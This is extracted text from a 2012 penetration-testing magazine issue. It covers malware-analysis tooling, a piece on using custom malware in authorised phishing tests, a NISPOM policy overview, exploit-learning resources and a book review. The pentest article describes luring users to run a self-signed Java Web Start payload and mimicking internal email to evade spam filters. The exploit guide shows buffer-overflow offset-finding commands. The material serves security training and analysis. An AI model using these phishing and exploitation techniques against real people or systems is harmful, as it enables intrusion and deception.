StringsThe Strings tool provides exactly what the name says, file strings. Strings are obtained by parsing through the file and extracting any lines of text or characters which are grouped together to a certain length. Using the strings, you can obtain things like (Figure 1):

• Packer being used (in the example we see UPx)

• File Properties Data• Import functions and libraries• Interesting character strings

A number of elements qualify a string as inter-esting, for example if you find a string like “Cre-ated by Hax0rz” or if you find the path to the proj-ect file used by the file compiler, these strings should be written down and can be used to help identify the intent and identity of the file. Oth-er interesting strings include, but are not limited to:

Page21 http://pentestmag.com08/2012 (16) August

• URLs• IP addresses• Username or Passwords• Comment or Output strings• File Paths• Registry Keys• Digital Signature Data (might be fake)

In addition to strings, the tool also provides an MD5 hash of whatever file you decide to run against it and grabs the size of the file on disk. This information falls into the “File Properties” bucket of data we need to gather. There are other tools which can give other types of hash values, such as SHA1 or SHA256, which can be used to create an even more unique identity for the file in question.

PEIDIn a perfect world, all files would always be easy to analyze as soon as you get a hold of them, unfortunately this is not the case as we see with the use of ‘packers’. A packer is a tool which es-sentially runs the entirety of a file through an al-gorithm to ‘obfuscate’ it or make it difficult to an-alyze. What PEID does, is analyze a packed file and search for characteristics of a certain type of packer being employed. It uses a compre-hensive internal database of different packers and presents the findings to the user. In Figure 2, we see PEID determined that the file ‘Evil-File.exe’ was packed with UPx, a fairly common packer.

Knowing what packer is being used gives us two key pieces of information

• We won’t be able to gather any detailed infor-mation from the file statically unless we unpack it first

• The use of the packer can be associated with the intention of the file, I.E. malware is more likely to use non-standard packers.

The discovery of a packer being used does not mean that the file is malware, in fact many legiti-mate programs use packer algorithms, like UPx, in their files to help protect against reverse engi-neering. It is important to write down exactly what packer PEID detects, if any, and then to try and find an unpacker program. There are multiple un-packer programs out there and some are very specific to the packer type while others are more generic, two that I use fairly often are:

• GUnpacker• QUnpack

You can download both of these tools for free from the QUnpack website (In Russian) Here.

Figure 1. Strings Extension Tool

Figure 2. PEID Interface

Figure 3. Unpacked Strings

MAlWARE

Page22 http://pentestmag.com08/2012 (16) August

You can also download PEID from various plac-es online; here is a link to the Softpedia download site.

Unpacked StringsFigure 1 was a screenshot of the file strings for the packed file, sometimes you can find interesting packed strings but most times you cannot, there-fore you need to unpack it first. Figure 3 shows what the file strings are of the same file but un-packed. It didn’t take long to find a whole set of strings which appear to be bot commands.

If you discover that there is no packer detected by PEID but the strings still seem to be garbled, make sure that the file isn’t packed by something that PEID might not recognize or if the really juicy strings aren’t obfuscated all on their own. To do this click the “>>” button on the PEID interface in order to gather extra information on other possi-ble detection factors which can tell you if the file is possibly packed in different ways.

PE ExplorerPE Explorer is an incredibly powerful tool which can essentially tear open a file and show you its innards. Using this tool we can obtain some more of our static analysis phase information, for example:

• Compile Date• Resources• Header/Section information• Dependencies• Lots of other useful information

In Figure 4, we see the header info for “EvilFile.exe” and can derive the compile date, or when it was originally created. The compile date is impor-tant because not only can it give you a timeframe of how long the file has been infecting computers but also if the file was compiled a few years ago it is less likely to be malware. Keep in mind howev-er, this value can be changed and therefore is not

Figure 4. PE Explorer Interface

Page23 http://pentestmag.com08/2012 (16) August

completely trustworthy. Be sure to write down the compile time in your notes.

In many cases, malware hides as legitimate files and while there are numerous ways to detect whether or not a file is legitimately what it claims to be, a good way is to check the ‘section headers’ be-tween the suspicious file and a legitimate version of the file you obtain online or from a clean system. As seen in Figure 5, the file ‘dxdiag.exe’ on top is the legitimate version of this file, while the bottom file is malware in disguise. It is evident that not only does the malware not have the same headers as the legitimate file but even the sizes are complete-ly different. This all means that the two files are not the same or even related and therefore the bottom file becomes even more suspicious.

While it might be possible to obtain library de-pendencies and import functions from something like the file strings, a much more organized meth-od is to use the ‘import viewer’ in PE Explorer. In figure 6, you can see that ‘EvilFile.exe’ uses the li-brary URLMON.DLL and the import function ‘URL-DownloadToFileA’ which, if you aren’t familiar with it, allows a program to download a file using a URL as input and save the file locally on the system in whatever location and with whatever name the program designates. This function alone flags the file as possibly malware if the ability to download

files is a function that does not fit with what the file describes itself as.

At this point you should have a comprehensive look from a static standpoint at your suspicious file. Make sure to write down in your notes any interesting im-ports or even import functions you aren’t familiar with that you can look up later. Double check your notes and ask yourself if there are any other interesting things about the functionality or properties of the file that might make it more unique and if you need to, go back and look up that information again. To get your own copy of PE Explorer, you can get it from Heav-enTools, the developer of the tool. You can download the free version or buy a license for it. Keep in mind that the tools mentioned here are only a few of the many available to you, so if you are looking to obtain any kind of specific information that these tools do not provide, search online for a tool that does.

Search for it!If you are reading this article, it probably means that you aren’t a malware analyst by trade, in say-ing that you might have the ability to take some shortcuts in determining what the file is that you are dealing with. One of these shortcuts is to plug some of the unique data you obtained from the static analysis phase into a search engine and see what pops up.

Figure 5. Comparing Section Headers with PEID

MAlWARE

Page24 http://pentestmag.com08/2012 (16) August

In Figure 7 you can see that I decided to search for some of the bot command strings which I found in the unpacked version of ‘EvilFile.exe’. What I found was the same string being listed in some strings posted online by an online malware analy-

sis scanner. I investigated the link and checked out a few other strings to make sure they matched my file; once I confirmed they matched, I grabbed the MD5 of the file and used another online scanner, virusTotal.com. I searched on virusTotal with the

Figure 6. PE Explorer: Import Viewer

Figure 7. Searching for Strings

Page25 http://pentestmag.com08/2012 (16) August

MD5 and as it turns out, it had already been ana-lyzed; Figure 8 shows the results of this analysis.

I was also able to check imports and section header location of the submitted file to make sure they were similar to my file. This is just one way of

using information from only static analysis to de-termine if a file is malware or not, in this case it was and I had discovered a variant of this malware without ever having to execute it. It is important to note however, that this is not usually the norm, if you have discovered a file which is not detected by antivirus or Anti-Malware engines and screams malicious, then you most likely won’t find any use-ful information online, however not all is lost as the next section describes.

online Auto Analysis ToolsI understand that when performing penetration testing on a network, you will have certain rules to follow and one of those rules might be that you cannot release any of your findings to anyone out-side of your customer; if that is the case for you then you might have to resort to performing the Dy-namic Analysis phase on your own. However, if it is not then here is another shortcut for you!

There are multiple online malware analysis en-gines which you can submit suspicious files to in order to get an idea of whether or not the file is

Figure 9. Process Explorer Interface

Figure 8. VirusTotal Results

MAlWARE

Page26 http://pentestmag.com08/2012 (16) August

malicious and/or what it can do. This might save you a lot of time you would have spent perform-ing dynamic analysis. Different scanners have dif-ferent ways of presenting information to the user, some of them are more technical and will list out

the results of executing the file, others will only inform you whether or not the file performs mali-cious actions. Here is a short list of useful online scanners, keep in mind there are a lot more than this and it’s up to you which one you prefer to use:

• virusTotal• Anubis• ThreatExpert

Another thing to keep in mind is that many securi-ty researchers and antivirus vendors will use the output of these tools for research or writing signa-tures to detect the files, so if you do not want any-one else knowing about your file before you get a chance to do something with it, then do not sub-mit it to these scanners.

Dynamic AnalysisThe next phase of analysis is Dynamic Analysis, which means actually running the file (if it is an executable) and monitoring any actions by the file or changes it makes to the oper-ating system. When performing Dynamic Analysis you should be able to obtain the following types of data:

Figure 11. RegShot Interface

Figure 12. RegShot output

Figure 10. Process Monitor Interface

Page27 http://pentestmag.com08/2012 (16) August

• File creation/deletion/modifications• Registry creation/deletion/modifications• Any network operations performed• Any other processes created by the executable• Any process injections performed by the file• And all other operations performed by execut-

ing the file

Dynamic Analysis ToolsJust like with Static Analysis there are specific tools which are used to perform the dynamic anal-ysis phase, here is a list of the few we are going to use:

• SysInternals / WinInternals Suite• Process Explorer• Process Monitor

• RegShot• Wireshark

Process ExplorerProcess Explorer is a very useful tool which acts like the Windows tool “Task Manager”. It allows you to monitor what processes are running and gather more information about them, you would use this tool while performing Dynamic Analysis to quickly observe if there are any subsequent processes be-ing created by the executable or if the file executed at all. Figure 9 shows the execution of ‘dxdiag2.exe’ a file which I executed in my testing environ-

ment; notice how it created multiple instances of cmd.exe to perform its operations.

Process MonitorProcess Monitor, or ProcMon, monitors everything all processes do on the system, safe to say it is a resource hog. However, it does allow for fine-tuned filters to be created, zeroing in on exactly what you are looking for, operations or process wise. This tool can be used to see the detailed operations performed by a process, everything from file modi-fications and registry modifications to process and thread creation. Figure 10 shows our sample ‘dx-diag2.exe’ adding a new registry value to make itself execute every time the operating system starts.

You can download the entire Sysinternals suite, which comes with numerous different tools directly from the Microsoft website.

RegShotTake the kind of operations you would see being listed and detailed in process monitor and simpli-fy it into an easy to read text file and that is what RegShot can provide. RegShot will take a snap-shot of the current registry and file system before execution and one after, then compare the two and provide the user with the results. This tool is very useful when attempting to determine what files are created/deleted and what changes to the registry

Figure 13. Wireshark Interface

MAlWARE

Page28 http://pentestmag.com08/2012 (16) August

were made. Figure 12 shows the output from run-ning RegShot with ‘dxdiag2.exe’ including the cre-ation of multiple files and deletion of the original executable.

You can download RegShot from the developers SourceForge page.

WiresharkWireshark is not a new tool nor should you, prob-ably being a penetration tester, be unfamiliar with it. However it is just as important in performing analysis on a suspicious file as it is in penetra-tion testing. You can obtain useful information like traffic sent from the suspicious file, what ports it is using and what URL or IPs it is connecting to. Figure 13 shows the network traffic from ‘dxdi-ag2.exe’, notice at the packet data at the bottom of the screenshot, the suspicious file is sending what applications I currently have open to whom-ever it is connecting to, this can be a clear sign of malicious intent. If you don’t have it already, you can download Wireshark from the develop-er’s website.

licensed Tool: GFI SandboxWhile we have primarily spoken about tools which you can obtain for free (at least for a trail) in per-forming your analysis, if you would rather pur-chase one tool that could do all of it for you, I would recommend GFI Sandbox. GFI sandbox will run a file in a completely virtual environment, log all the information about the file and its operations then present it all to the user in a neat format, making it easy to find unique and interesting data without ever having to perform any of the analysis your-self. GFI Sandbox is not free however and while you can submit files to their online scanner for no charge, to run the tool in a private setting it would cost a license fee.

Dynamic Analysis ConclusionsIn explaining the tools and methods behind dy-namic analysis, I used a few different executable files to show how the tools work. The key to be-ing able to determine whether or not a file is ma-licious based upon dynamic analysis results lies within knowing what operations are indicative of malware. For example, regular beaconing and cre-ating start-up registry entries are usually associ-ated with malware; however, the same operations could be performed by a legitimate program. It is important that you always use all of your data to come to a conclusion and anything you are unsure

about you should always ask questions or do web searches until it all makes sense.

Code AnalysisThe best methods of determining whether or not a file is malware are found within the static and dy-namic analysis phases, however if all else fails and the file still appears malicious after testing and re-searching and you have not come to a conclusion, then code analysis may be required. However, code analysis is something that I cannot describe in a single article and it is recommended that if you feel the need to perform that phase you should ei-ther begin researching code analysis tutorials or find a professional malware reverse engineer to take a look at the file for you.

ConclusionIt is never easy to determine whether or not a file is malicious when it is not being detected by anti-virus or Anti-Malware scanners, however it is un-likely to be a problem most penetration testers find themselves faced with very often. Even still, while we see stories about super malware on the news, the basic technology and methods used by mal-ware has been the same for some time and all it takes is a little bit of research and checking out the details to determine whether or not a file is mali-cious. Malware analysis itself is a discipline which takes years to develop thoroughly and that is why I advise you to not attempt to find new and interest-ing malware on your own but only to identify a file which might be malware and if you suspect that it is, go online and submit it to the security commu-nity. You can always submit suspicious files to the researchers at Malwarebytes.org and we will be happy to check on it for you and add it to our roster of detected malware.

ADAM KUjAWAAdam Kujawa is a computer scientist with over seven years’ experience in reverse engineering, malware anal-ysis and penetration testing. He has worked at a number of United States federal and defense agencies, helping these organizations research malware threats as well as develop defense and mitigation techniques. Adam has also previously taught malware analysis and reverse en-gineering to military and civilian personnel.

MAlWARE

Page30 http://pentestmag.com08/2012 (16) August

Using malicious software as a part of a pen-etration test requires utmost preparation and caution. Cyber criminals are not ac-

countable for the behavior of their malware and the harm it causes. As a result, the malware used by attackers may reduce the availability of services, expose the network to other attacks or infect sys-tems that are not part of the attack. When perform-ing a professional penetration test, the tester must take measures to mitigate these risks.

RequirementsThe goal of a penetration test that involves phish-ing is installing, in a controlled manner, malware on client machines. To show the success of the exploitation, it is sufficient for malware to remote-ly control the device. In the same time, the tes-ter must make sure he/she prevents others from abusing the same malware for attacking the client.

Before starting the penetration test, the tester must ensure that a client understands what the (busi-ness) risk is of each action is and make sure the client agrees. In addition, malware must be tailored to the needs and the environment of the client. Tai-loring malware also increases the chance of infect-ing the machines without triggering virus scanners, firewalls, etc. As a part of our assignments which in-volve deployment of malware through social means

(phishing mail and USB drives), we defined a num-ber of requirements malware must satisfy:

• The testers should be sure that malware does not have hidden functions. Third par-ty developed malware might contain functions that are not documented. Installing such a mal-ware at a client machine might expose the or-ganization to new attack vectors. Therefore, it is best when malware is developed internally. Internal development allows hardcoding of mal-ware capabilities.

• The connection between malware and com-mand and control (C&C) server must be protected. The C&C server informs malware of the actions malware needs to execute, and receives the output from malware. If the com-munication between the devices is not secure, another attacker can read the results from the actions, or even gain control over malware.

• The C&C server must be hardened. If the C&C server gets compromised, it might open the client network to external attacks. Therefore, the server must be hardened. As one of the hardening mea-sures, the C&C server must not be reachable for any other software except malware.

• No device except the C&C server can com-municate with malware. Malware has privi-

Using Malware During a Penetration TestMalware is often associated with negativity; this is not surprising as malware is short for “malicious software”. Malware is frequently used by cyber criminals to send spam, obtain account information, show unwanted advertisements, steal credit card numbers and obtain remote access to the internal network. In this article, we focus on using malware as a part of a penetration test.

Page31 http://pentestmag.com08/2012 (16) August

of the properties we encode in our malware and C&C server, to assure the clients that the assign-ment is carried out with minimal impact to the client business processes.

• The malware connects to a hardcoded IP.• There is SSL connection from malware to the

C&C server.• The malware self-destruct on predetermined

hardcoded date.• No infection after a predetermined hardcoded date.• No infection on machines which are not on a

whitelisted domain. • If the malware is located at a website, the web-

site is reachable only from the target IP range (IP tables filter).

• The C&C server is reachable only through a vPN.• The C&C server is protected with strong passwords.• The list of targets is discussed and agreed with

clients and is hardcoded in the malware.

ConclusionDeveloping malware is quite a straightforward task for an experienced software developer with a se-curity mindset. However, developing malware that can be used for penetration testing requires con-sidering a number of requirements that assure third parties that malware will behave as intended, and within the scope of the assignment. In this arti-cle we touched to a number of these requirements and listed how we use these requirements as part of our social engineering assignments in the Secu-rity & Privacy Group in Deloitte.

leged access to the client device. If an attack-er manages to communicate to the malware, it might override the commands of the C&C serv-er and use malware for malicious actions.

• Malware should operate only in the time frame of the assignment. The client needs to have its devices clean after the penetration test, as they were before the start of the test. There-fore, the client must be assured that all client machines will be sanitized and that malware will stop functioning after the test is finished. Mal-ware should be benign before the assignment starts. After the assignment malware should al-so stop working and self-delete.

• Malware must infect only predetermined de-vices. After infecting one device, malware could start propagating to other devices that are out of the scope of the assignment or moreover to de-vices out of the control of the client. Therefore, the testers should have a predetermined list of devices malware is allowed to propagate to.

Practical caseAs part of the social engineering assignments, we use custom build malware to simulate an attack from a malicious attacker. We translated the above requirements to a number of practical steps that provide assurance the assignment will be executed without additional risks to the client. Here are some

TRAjCE DIMKovTrajce Dimkov has obtained a PhD in Information Security with focus on physical penetration and social en-gineering methodologies. With over 6 years of experience, Trajce is a part of the Security & Privacy Team of De-

loitte NL, where he is involved in a number of penetra-tion testing assignments.

HENRI HAMBARTSUMYANHenri Hambartsumyan is a consultant in the Security & Privacy Team of De-loitte NL. He has over 4 years of expe-rience in IT. He is involved in perform-ing source code reviews, ethical hacking and physical penetration testing assign-

ments for various financial services clients. Henri is part of the world champions team of the Cyberlympics 2011.

Additional questions to the authorsIn what language do you prefer to write the exploit?We actually do not write any exploit to ensure that the malware injection work on all different environments. Instead, we use a self-signed Java Web Start applica-tion. Before loading the JWS application, we explain on the website to the user, that they might experience some “technical difficulties”, they are encouraged to click OK and ignore the error messages.

What kind of server do you use for the C&C?Linux machine with Apache & PHP, interface to control all the machines. The C&C is custom built.

What tool do you use for developing the email to make it appear as phishing?We get hold of an old internal email and used the same format to develop our phishing mail in. We do not use any specific tools for it except Outlook to send it and Word to do proper table/layout work. It takes quite some time to get the message through the spam filter as the complexity of the layout tables had impacted the spam filter. We usually end up using a table and 3 graphics (client’s logo, footer and header).

NISPOM

Page32 http://pentestmag.com08/2012 (16) August

As we continue our multi-part journey through the catacombs of physical security, we will examine more closely the National Industri-

al Security Program Operating Manual (NISPOM) and look at the strengths and weaknesses of what the United States Department of Defense set out as standards and methods for their contractor base.

This needs to be addressed from a high level perspective since the NISPOM is essentially pol-icy by which the government sets the standards for its industrial base. The same industrial base that in return supports the mission of the US Government. Although written by the Defense Department, it nevertheless is subscribed to all organizations doing work for the federal govern-ment.

As nearly 80% of all US government activities is outsourced, in accordance with the Office of Man-agement and Budget Circular A-76, which obli-gates federal agencies to turn non mission-orient-ed activities to contractors, there had to be some standards and guidance, so NISPOM, or (DoD 5220.22-M) – the formal DoD nomenclature for NI-SPOM – became the de facto standard.

Essentially it comes down to being all about trust – and as such there are loopholes big enough to drive a truck through.

The Physical RealityTo refresh, the Chapters we’ll be discussing in this series of articles are from NISPOM as follows:

• General Provisions and Requirements• Chapter 2 – Security Clearances

• Section 1 – Facility Clearances• Section 2 – Personnel Security Clearances• Section 3 – Foreign Ownership, Control, or

Influence (FOCI) [1]• Chapter 3 – Security Training and Briefings• Chapter 4 – Classification and Marking• Chapter 5 – Safeguarding Classified Informa-

tion• Chapter 6 – visits and Meetings• Chapter 7 – Subcontracting• Chapter 8 – Information System Security• Chapter 9 – Special Requirements

• Section 1 – RD and FRD• Section 2 – DoD Critical Nuclear Weapon

Design Information (CNWDI)• Section 3 – Intelligence Information• Section 4 – Communication Security (COM-

SEC)• Chapter 10 – International Security Require-

ments• Chapter 11 – Miscellaneous Information

Section 1 – TEMPEST

NISPoMThe Physical Aspects of Cybersecurity and Their Importance

NISPOM as a whole is designed to “prescribe the requirements, restrictions, and other safeguards to prevent unauthorized disclosure of classified information.” That’s it. Plain and simple. The beauty of this document lies in its simplicity, however, if anyone has ever written policy before, they are fully aware of how difficult it is to make something simple.

08/2012 (16) August

• Section 2 – Defense Technical Information Center (DTIC)

• Section 3 – Independent Research and De-velopment (IR&D) Efforts

• Appendices [2]

This week we’ll outline the contents of each sec-tion in an abbreviated manner and through brief narrative, and follow on articles will then delve in-to highlighting weaknesses, vulnerabilities, threats and risk. This approach is applied due to the fact that firstly we need to understand WHAT is said in order to analyze strengths and weaknesses.

Defense in DepthThe document as a whole is designed to “pre-scribe the requirements, restrictions, and other safeguards to prevent unauthorized disclosure of classified information.” [3] That’s it. Plain and sim-ple. Exactly how it should be. The simpler the mis-sion statement, the greater the likelihood it will be understood and executed properly. The beauty of this document is its simplicity, however, if anyone has ever written policy before, they are fully aware of how difficult it is to make something simple. That is why it is my belief and credo that “Words Matter”.

The best way to establish a defense in depth pol-icy is, using a three ringed or tiered architecture model – simple, simpler, simplest. The KISS[4] principle is alive and well in all of NISPOM. And if you think about it, it has to be. The simpler the instructions, the greater the likelihood of having them followed correctly. True military style that would make Tsung Tsu proud.

The document then discusses clearances rela-tive to the sensitivity of classified material and the “need to know”. Chapter 2 talks about setting up and maintaining a facility clearance – something granted to enable classified material to be man-aged throughout the entire physical area or cer-tain areas. There are specific requirements such as signs and notices advising the cleared are and more often than not, any type of communication device is not allowed unless the device itself has been classified and inspected – something we will get into when we talk about TEMPEST.

For a facility to be issued a facility clearance there are enormous safeguards needed to be put in place; from certain types of locks, to specifica-tions of storage filing cabinets and combination locks, to the most important aspect, namely con-trolled access. A controlled access area is one in

For many years, Joe Weiss has been

sounding the alarm regarding the potential

adverse impact of the ‘law of unintended

consequences’ on the evolving convergence

between industrial control systems

technology and information technology. In

this informative book, he makes a strong

case regarding the need for situational

awareness, analytical thinking, dedicated

personnel resources with appropriate

training, and technical excellence when

attempting to protect industrial process

controls and SCADA systems from potential

malicious or inadvertent cyber incidents.”

—Dave Rahn, Registered Professional Engineer, with 35 years experience.

FOR INTERNATIONAL ORDERS:McGraw-Hill Professional

www.mcgraw-hill.co.uk PhOne: 44 (0)1628 502700

FOR US ORDERS:www.momentumpress.net

PhOne 800.689.2432

NISPOM

Page34 http://pentestmag.com08/2012 (16) August

which everyone coming and going must sign in and show credentials equivalent to the level of in-formation available for their review at that site.

The section continues by discussing how all per-sonnel at a site must hold clearances in accor-dance with the information which they can access, both physically and virtually, on paper or the com-puter.

At this point you might wonder who is watching? Well besides cameras, sign in and sign out logs, badges, and embedded biometric systems, facili-ties are subject to anytime audits. These can come unannounced by the internal Facility Security Offi-cer, or the actual security service of the agency un-der which the contractor is performing their duties.

The last point to touch on relates to Chapter 2, Section 3 – Foreign Ownership, Control, or Influ-ence (FOCI). Here’s where it gets tricky.

“We all now realize that, contrary to the pro-nouncements of certain pundits, the world is not economically flat. But it is undeniable that its citi-zens and businesses are more economically con-nected than ever before. One manifestation of this interconnectedness is the increasing num-ber of cross-border acquisitions of business en-terprises. In most cases these transactions do not become the subject of public discussion or detailed government scrutiny. But when foreign entities seek to purchase U.S. government con-tractors who perform classified national security work and therefore hold facility security clear-ances (“FCLs”), the U.S. Government is anxious to know, among other things, the extent to which the company is the subject of foreign ownership, control or influence (“FOCI”). Being under FOCI can sound the death knell for a company’s ability to perform classified work, with consequent loss of business that may be critical to the company’s continued status as a going concern. But that out-come can often be avoided by development and submission of a FOCI mitigation plan which, if ac-cepted either as submitted or modified, can en-

able the company to continue performance of na-tional security work.” [5]

That’s how a foreign entity can serve a govern-ment agency and in fact hold a valid Facility Clear-ance. As I mentioned earlier, there are loopholes in NISPOM, and this is one of those areas, how-ever, no foreign government is going to be foolish enough to invite the spotlight on themselves by not following the policy and directives set forth in NI-SPOM.

There are, in fact easier ways in which espio-nage occurs – and it does occur. But that is for later discussion in this series, when we look at the dark side of Facility Clearances and the what, and how of counterintelligence.

Annotations[1] Highlight indicates the areas to be discussed in this installment of The Physical Aspects of Cybersecurity and The-

ir Importance – NISPOM[2] http://en.wikipedia.org/wiki/NISPOM, downloaded 17 June 2012.[3] NISPOM Chapter 1, General Provisions and Requirements [4] For those unfamiliar with the KISS principle, it has nothing to do with the band, but rather is an acronym for “keep

it simple, stupid”.[5] Government Contracts Law Blog, http://www.governmentcontractslawblog.com/articles/nispom/. Downloaded

22-July-12.

MARC GARTENBERGMarc Gartenberg has been involved in the security are-na for over 25 years. He has served as a consultant to over 12 US Government Agency Senior Executives, in ar-eas relating to Cybersecurity and Information Assur-ance posture and has served as Chief of Global Tech-nology Training for The US Department of State. He has been a contributing columnist for Computerworld Secu-rity and has lectured at numerous conferences, univer-sities, and technical institutes across the Former Soviet Union, including the regions of Central Asia and West-ern Siberia.Questions welcomed at: [email protected] Information:NISPOM Portal: http://www.nispom.org/NISPOM-down-load.htm

ExPlOITATION FRAMEWORKS

Page36 http://pentestmag.com08/2012 (16) August

This is not a guide on "how to find an 0day", because that’s something I don’t know my-self, but at the very least I can give you a

good starting point. First of all, you have to un-derstand, that exploiting is like science; it's a nev-er ending process, which requires patience, re-verse engineering, tinkering, and researching. And there is always something you don't know or understand.

The most important thingThe most important thing I recognized was that there are no black boxes or borders between the topics. You have to understand, connect, and relate each layer and component to another. For exam-ple, solving keygenmes with OllyDBG on Windows helped me to understand how to read Assembler, which then helped me to analyze binaries on Linux with gdb. So don't restrict yourself to one topic – be open-minded. I will now introduce some tutorials and exercises I found.

Lenas Reversing for Newbies (http://tuts4you.com/download.php?list.17) – This is a video tutorial which is really nice to start learning about working with a debugger and understanding the asm code flow. The instructions are very detailed and very easy to understand. This is definitely a very good start.

crackmes.de – It's a Community with a lot of crack-/keygenmes and very often with step by step instructions for any skill level. And when you feel confident, try an unsolved crackme, solve it and support others by providing a tutorial for it.

io.smashthestack.com – It is a wargame where you try to escalate out of each level, by exploiting or solving a lot of different and creative problems. It's an awesome feeling, when the shell of the next level pops up, after you spent hours of tinkering. I'm currently at level 13 and I've learned so much. There are not only standard exploit exercises like buffer-overflows or format-strings, but side-chan-nel attacks, cryptographic algorithms and much more.

exploit-exercises.com – It offers virtual machines with a lot of challenging levels. They do not offer solutions, but you can find a lot of really good write-ups in various blogs. It's very nice to train your skill and challenge yourself with the next level. It also has the advantage, that it runs on your machine, which is much faster.

binary-auditing.com – It has a lot off exercise bi-naries, to learn about reverse engineer software with IDA Pro. There are easy examples with "how does a function call in C looks like", "what happens when you create loops" but also more complex bi-naries, for example reversing malware.

Exploitation Techniques How You Should Start

Have you ever dreamed about writing your own 0day exploit? I really want to do it, and I work hard to learn everything I can about it. This article is about the experiences I have had so far in learning about exploit techniques, and I want to share some of the noteworthy sources I stumbled upon in order to support other beginners.

Page37 http://pentestmag.com08/2012 (16) August

corelan.be – It has a lot of really good articles about exploiting. They also offer live training, which I can't pay as a student, but I read that they are re-ally good. Nevertheless, their public tutorials are great for a beginner.

exploit-db.com – It is an Exploit Database I want to use for my next step: Learning about exploiting, by understanding already implemented and func-tional exploits.

The Shellcoders Handbook – It is a nice book, which teaches you the basic exploit techniques step by step. I found it more fun to learn and find out these techniques on my own, but it's obviously a good guidance with a probably quicker success. However, I've started to read it now.

IRC – IRC channels are great places where peo-ple with the same interests hang around. Be on the lookout for channels on your favorite websites, join them and support each other.

ProblemsYou will definitely run into many many prob-lems. I want to give you some examples of those which I ran into and show what I learned from them.

There is one task you often have to do and this is getting the right offset to place your addresses or instructions. This is often done with a trial and er-ror approach, but Metasploit has two really handy scripts in the tools directory – `pattern_create.rb` and `pattern_offset.rb`:

## create a pattern ## msf/tools # ./pattern_create.rb 40 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2A

## use the created pattern as your malicious input ##

Program received signal SIGSEGV, Segmentation fault.

0x41326241 in ?? ()

## and you can calculate the offset ## msf/tools # ./pattern_offset.rb 0x41326241 40 36

Another big problem for me was the changing environment. For example, I've created an ex-ploit and it worked while I observed the bina-ry with gdb, but it didn't work without gdb. There are many different possibilities to get more con-trol over your execution and I only know a few.

## unset the environment variables in gdb ## (gdb) unset env Delete all environment variables? (y or n) y

## run programs without environment variables ##

env -i /bin/sh sh-3.2$ env PWD=/tmp _=/usr/bin/env

Another example for controlling the environ-ment, which can be important for race-conditions or side-channel-attacks, is the number of used CPUs.

## run the exploit only on the first CPU ## taskset 0x00000001 ./exploit

ConclusionLearning about exploiting is fascinating. On the way you learn so much about the machine you use from day to day. Learning it by playing war-games and communicating with others is a lot of fun and a nice feeling. It will definitely broaden one's mind. After all, what else feels cooler than seeing a root shell spawning from your handcrafted input?

FABIAN “@SAMUIRAI” FAESSlERFabian “@samuirai” Faessler is a Computer Science stu-dent from Germany and an active contributor and mem-ber of shackspace (the Stuttgart Hackerspace – http://shackspace.de/).Email: [email protected]: www.smrrd.deTwitter: @samuirai

REvIEW

Page38 http://pentestmag.com08/2012 (16) August

It is a true learning experience from start to fin-ish and I would highly recommend this book to anyone with an interest in malware analysis.

This book delivers valuable lessons with practical challenges, delivered in hand-on labs, and it will not disappoint.

This book is well organized and is laid out in six parts starting with the basics and building up to shellcode and C++ analysis. It provides value to anyone with a passion to learn malware analysis, but individuals with prior high and low level pro-gramming knowledge will find the most immedi-ate benefits. The publication is focused around the Windows operating system but the techniques can be applied on your OS of choice.

Part 1 focuses on building a solid foundation with an introduction to basic analysis covering both static and dynamic analysis as well as building a lab for malware analysis in a safe location. Chap-ter 1 introduces us to the basics of static analy-sis through the use of tools, discussions of packed and obfuscated code, how and what to look for in linked libraries (DLL files), then brings it all togeth-er with a walk through of a malware sample. Chap-ter 2 gets into the all-important lab discussions and what you need to know about malware analysis and how to keep your network safe. The author gives recommendations as well as pros and cons

Practical Malware Analysis The Hands-on Guide to Dissecting Malicious Software

Have you ever wanted to reverse engineer malware to see exactly what it does when it infects its host? To understand how malware propagates, or even understand the malware enough to write custom signatures for your IDS/IPS to save your network? If any of these sound interesting and exciting this is the book for you.

Page39 http://pentestmag.com08/2012 (16) August

Chapter 15 kicks off part 5 of our journey with the discussion anti-disassembly and how to iden-tify these techniques, navigate around, and possi-bly defeat them. Chapter 16 continues the discus-sion of anti-reverse-engineering techniques with anti-debugging. Chapter 17 concludes the discus-sion of anti-analysis techniques with anti-vM tech-niques; these are used to evade analysis on virtual machines as these are commonly used by mal-ware analyst to safely conduct dynamic analysis of malicious code. Chapter 18 talks about packers and how they work, detection of packed programs and unpacking malware with both automated and manual techniques.

This brings us to the last part of the book, focus-ing on more advanced analysis methods which will include shellcode, C++, and 64-bit analysis. Chap-ter 19 describes shellcode dissection and handling as these are not usually more than just binary chucks of data that do not run as a typical execut-able. Chapter 20 teaches us how to identify basic C++ features in assembly language and the chal-lenges that this brings into the analysis process. Chapter 21 (the final chapter), touches on 64-bit malware and the minor differences between 32-bit and 64-bit malware analysis

You will find Appendix B of this book to be a great resource with a list of commonly used tools for malware analysis, description of the tool, and a link to download the application. In my opinion, what makes this book so great and different than any other book on malware analysis that I have seen to date are the labs at the end of each chap-ter with the detailed answers in Appendix C. There is a lot of information in this book to digest and may overwhelm a newer analyst at first, but you cannot ask for a better source for learning how to become proficient in this field. This book is a comprehen-sive manual to the art of malware analysis. Again I would highly recommend it to anyone that current-ly wants to gain or supplement their current skills and knowledge to become a successful malware analyst. As a side note, the author will be teach-ing a lot of these same techniques that we learned throughout this book in a class at the BlackHat USA 2012 Conference.

Review by Jeff Weaver

of different lab setups (You will want to pay atten-tion here if you want to keep the systems around your analysis workstation infection free). Chapter 3 picks up where chapter 1 ended, with basic dy-namic analysis teaching us about sandboxes and the tools used for system monitoring when the tar-get malware is run on our workstation.

Chapter 4 leads us into part 2, delivering a crash course in x86 disassembly, including discussions about heaps and stacks, registers, flags, function calls and more. Chapter 5 is all about IDA Pro, a common disassembler that is very common and powerful, making it the de-facto standard for the hobbyist and professionals alike. Throughout this chapter the author explores many of the powerful features of IDA Pro and explains some functional-ity that will greatly help any malware analyst in their quest. Chapter 6 is a great chapter as the author explains how to recognize C code constructs in as-sembly, which greatly reduces the amount of in-structions that we must analyze to get a high-level picture of what the suspect code is doing. Chapter 7 provides us a glimpse of Windows programming with an overview of the Windows API, registry, net-work APIs, kernel and user mode functions, and then wrapping up with the Native API, which will take us into part 3 – advanced dynamic analysis.

